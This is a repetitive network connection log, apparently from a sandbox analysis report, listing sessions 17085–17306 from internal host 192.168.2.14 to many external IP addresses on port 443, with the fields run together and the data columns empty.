                                              17085192.168.2.1436460190.128.173.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17086192.168.2.1453186206.168.245.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17087192.168.2.1453272197.17.209.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17088192.168.2.1444916192.26.214.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17089192.168.2.145060060.14.47.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17090192.168.2.1457154196.51.128.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17091192.168.2.144983498.157.78.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17092192.168.2.145224420.134.163.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17093192.168.2.144722461.148.118.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17094192.168.2.1436090213.235.25.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17095192.168.2.1436382129.57.47.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17096192.168.2.1432830171.70.91.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17097192.168.2.1449928175.159.218.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17098192.168.2.1433628181.15.123.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17099192.168.2.1439866101.96.90.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17100192.168.2.1459518154.163.107.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17101192.168.2.1458648218.122.114.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17102192.168.2.143469235.172.121.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17103192.168.2.144735645.220.192.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17104192.168.2.1436448104.64.143.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17105192.168.2.146038275.129.43.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17106192.168.2.145519643.146.251.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17107192.168.2.144989892.15.17.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17108192.168.2.144591224.28.89.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17109192.168.2.145940857.123.45.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17110192.168.2.143475817.13.255.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17111192.168.2.145008267.106.112.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17112192.168.2.1435492211.241.187.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17113192.168.2.144623614.93.81.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17114192.168.2.1449910212.153.178.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17115192.168.2.1451098218.165.120.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17116192.168.2.1435986200.162.227.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17117192.168.2.1446410166.126.94.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17118192.168.2.1437604147.44.43.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17119192.168.2.145737692.135.9.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17120192.168.2.1452714133.146.116.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17121192.168.2.1448502176.40.170.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17122192.168.2.145039285.249.173.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17123192.168.2.144727819.125.223.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17124192.168.2.1458834189.39.16.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17125192.168.2.1447610220.178.58.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17126192.168.2.143711041.77.34.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17127192.168.2.144471480.0.185.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17128192.168.2.144453057.203.163.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17129192.168.2.1445422175.233.103.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17130192.168.2.1439882117.81.117.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17131192.168.2.1437230111.110.40.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17132192.168.2.1453286117.3.91.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17133192.168.2.144911825.215.139.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17134192.168.2.1450896156.128.134.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17135192.168.2.1458408194.14.239.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17136192.168.2.1446418118.150.146.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17137192.168.2.143468089.144.212.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17138192.168.2.144564044.16.83.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17139192.168.2.145565251.159.103.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17140192.168.2.1440992142.234.29.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17141192.168.2.146033050.248.35.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17142192.168.2.1450738135.4.63.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17143192.168.2.143672488.176.105.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17144192.168.2.143927497.181.166.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17145192.168.2.1456620169.180.54.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17146192.168.2.145137687.152.234.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17147192.168.2.1436376123.239.171.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17148192.168.2.144461695.207.200.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17149192.168.2.1447482111.232.223.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17150192.168.2.143736866.214.229.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17151192.168.2.145741491.126.84.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17152192.168.2.1455766130.3.65.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17153192.168.2.143836435.133.39.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17154192.168.2.1457110152.37.125.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17155192.168.2.1458554212.10.37.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17156192.168.2.144734659.164.9.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17157192.168.2.1444086116.160.1.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17158192.168.2.1459396138.188.126.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17159192.168.2.146081284.241.67.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17160192.168.2.144442282.34.212.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17161192.168.2.1450412182.55.132.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17162192.168.2.143364452.220.213.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17163192.168.2.1452690109.226.98.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17164192.168.2.1434008165.39.138.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17165192.168.2.1456706167.25.218.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17166192.168.2.145676035.203.33.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17167192.168.2.145221475.170.19.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17168192.168.2.144800469.231.35.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17169192.168.2.1452284134.41.192.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17170192.168.2.144116890.244.214.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17171192.168.2.145064651.8.10.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17172192.168.2.145087420.253.253.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17173192.168.2.144343254.196.183.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17174192.168.2.143892420.37.17.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17175192.168.2.1441692171.12.48.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17176192.168.2.145849831.210.139.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17177192.168.2.1443796103.9.246.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17178192.168.2.146095848.62.13.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17179192.168.2.145117660.4.120.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17180192.168.2.143864448.230.72.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17181192.168.2.1439212155.84.93.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17182192.168.2.1457052141.73.217.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17183192.168.2.1453452121.217.182.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17184192.168.2.145049035.240.35.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17185192.168.2.144022666.158.143.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17186192.168.2.1460088204.108.165.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17187192.168.2.1447514185.124.193.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17188192.168.2.1457434105.240.228.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17189192.168.2.1455956165.79.61.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17190192.168.2.1438270222.50.79.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17191192.168.2.1443146144.53.163.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17192192.168.2.143650664.150.136.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17193192.168.2.1446930164.123.69.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17194192.168.2.1455040123.157.174.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17195192.168.2.1447564144.80.203.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17196192.168.2.1450872166.47.41.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17197192.168.2.1447280111.116.232.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17198192.168.2.1438362195.107.163.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17199192.168.2.144389642.41.121.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17200192.168.2.144301070.94.182.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17201192.168.2.144887437.195.35.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17202192.168.2.1449106130.18.5.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17203192.168.2.1459552149.7.29.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17204192.168.2.1441202197.208.98.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17205192.168.2.1444710119.23.247.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17206192.168.2.1432768159.72.166.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17207192.168.2.144844087.156.113.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17208192.168.2.1441160113.219.155.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17209192.168.2.1449720213.28.54.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17210192.168.2.145155448.155.123.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17211192.168.2.1448394141.74.185.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17212192.168.2.144810275.107.47.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17213192.168.2.146018450.215.204.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17214192.168.2.1436610125.195.104.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17215192.168.2.145917267.236.140.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17216192.168.2.145675896.223.38.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17217192.168.2.14577968.176.132.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17218192.168.2.145673846.253.148.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17219192.168.2.1434998205.127.25.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17220192.168.2.144747452.165.56.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17221192.168.2.144163813.211.163.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17222192.168.2.1436210114.225.163.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17223192.168.2.143470441.164.18.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17224192.168.2.145257639.22.83.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17225192.168.2.1446294152.89.203.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17226192.168.2.144515219.162.162.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17227192.168.2.143926888.18.192.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17228192.168.2.1448324123.190.216.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17229192.168.2.144374658.155.253.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17230192.168.2.145156091.162.63.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17231192.168.2.145927284.12.145.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17232192.168.2.1448910167.166.205.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17233192.168.2.1457290111.219.162.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17234192.168.2.1440796153.146.164.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17235192.168.2.1454802116.181.231.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17236192.168.2.143657240.44.64.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17237192.168.2.143824665.229.194.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17238192.168.2.14416221.106.248.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17239192.168.2.1434074199.60.170.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17240192.168.2.1443008201.242.172.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17241192.168.2.144929461.26.150.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17242192.168.2.1455254221.21.141.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17243192.168.2.143799279.215.151.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17244192.168.2.143767871.235.74.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17245192.168.2.1440550149.141.142.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17246192.168.2.1455388207.239.47.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17247192.168.2.145496295.161.221.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17248192.168.2.1440356143.201.92.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17249192.168.2.1448696134.120.59.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17250192.168.2.1460530223.144.139.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17251192.168.2.1448206132.46.211.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17252192.168.2.1451484212.209.119.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17253192.168.2.1443634213.137.169.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17254192.168.2.14472502.100.54.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17255192.168.2.145984891.143.26.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17256192.168.2.1453412125.68.178.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17257192.168.2.145223699.118.204.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17258192.168.2.143682438.168.252.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17259192.168.2.143499468.244.216.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17260192.168.2.1433718100.197.54.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17261192.168.2.1458238201.169.176.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17262192.168.2.1440344114.147.91.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17263192.168.2.143483227.64.59.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17264192.168.2.1452314188.125.101.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17265192.168.2.143673099.75.107.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17266192.168.2.14522105.162.7.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17267192.168.2.1457522172.0.35.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17268192.168.2.1457818204.138.51.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17269192.168.2.1436052184.225.127.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17270192.168.2.1446698120.122.160.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17271192.168.2.1458542176.131.4.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17272192.168.2.1445198121.205.227.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17273192.168.2.1433536151.208.191.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17274192.168.2.1435912217.76.156.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17275192.168.2.1443842203.44.170.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17276192.168.2.1451218196.201.209.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17277192.168.2.1439090220.188.17.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17278192.168.2.1435832183.252.176.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17279192.168.2.1452498133.248.114.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17280192.168.2.1450160142.125.22.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17281192.168.2.145263691.110.144.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17282192.168.2.1457568178.236.32.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17283192.168.2.1445200205.27.6.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17284192.168.2.14609209.34.3.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17285192.168.2.1451938111.14.3.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17286192.168.2.144795489.90.218.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17287192.168.2.1454414146.136.219.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17288192.168.2.145079813.218.80.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17289192.168.2.1454686100.224.151.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17290192.168.2.1452280124.103.43.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17291192.168.2.144155695.168.170.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17292192.168.2.1443492192.41.131.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17293192.168.2.1437242165.185.12.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17294192.168.2.1439398130.72.44.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17295192.168.2.1452068180.27.103.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17296192.168.2.146092080.204.74.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17297192.168.2.1449176213.103.57.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17298192.168.2.143535212.164.85.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17299192.168.2.1457878144.245.181.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17300192.168.2.145696277.204.21.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17301192.168.2.1434666123.62.147.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17302192.168.2.1440104151.48.41.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17303192.168.2.14332208.186.129.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17304192.168.2.1441512196.99.203.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17305192.168.2.1455914200.131.72.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17306192.168.2.1448380148.75.82.85443
                                              TimestampBytes transferredDirectionData


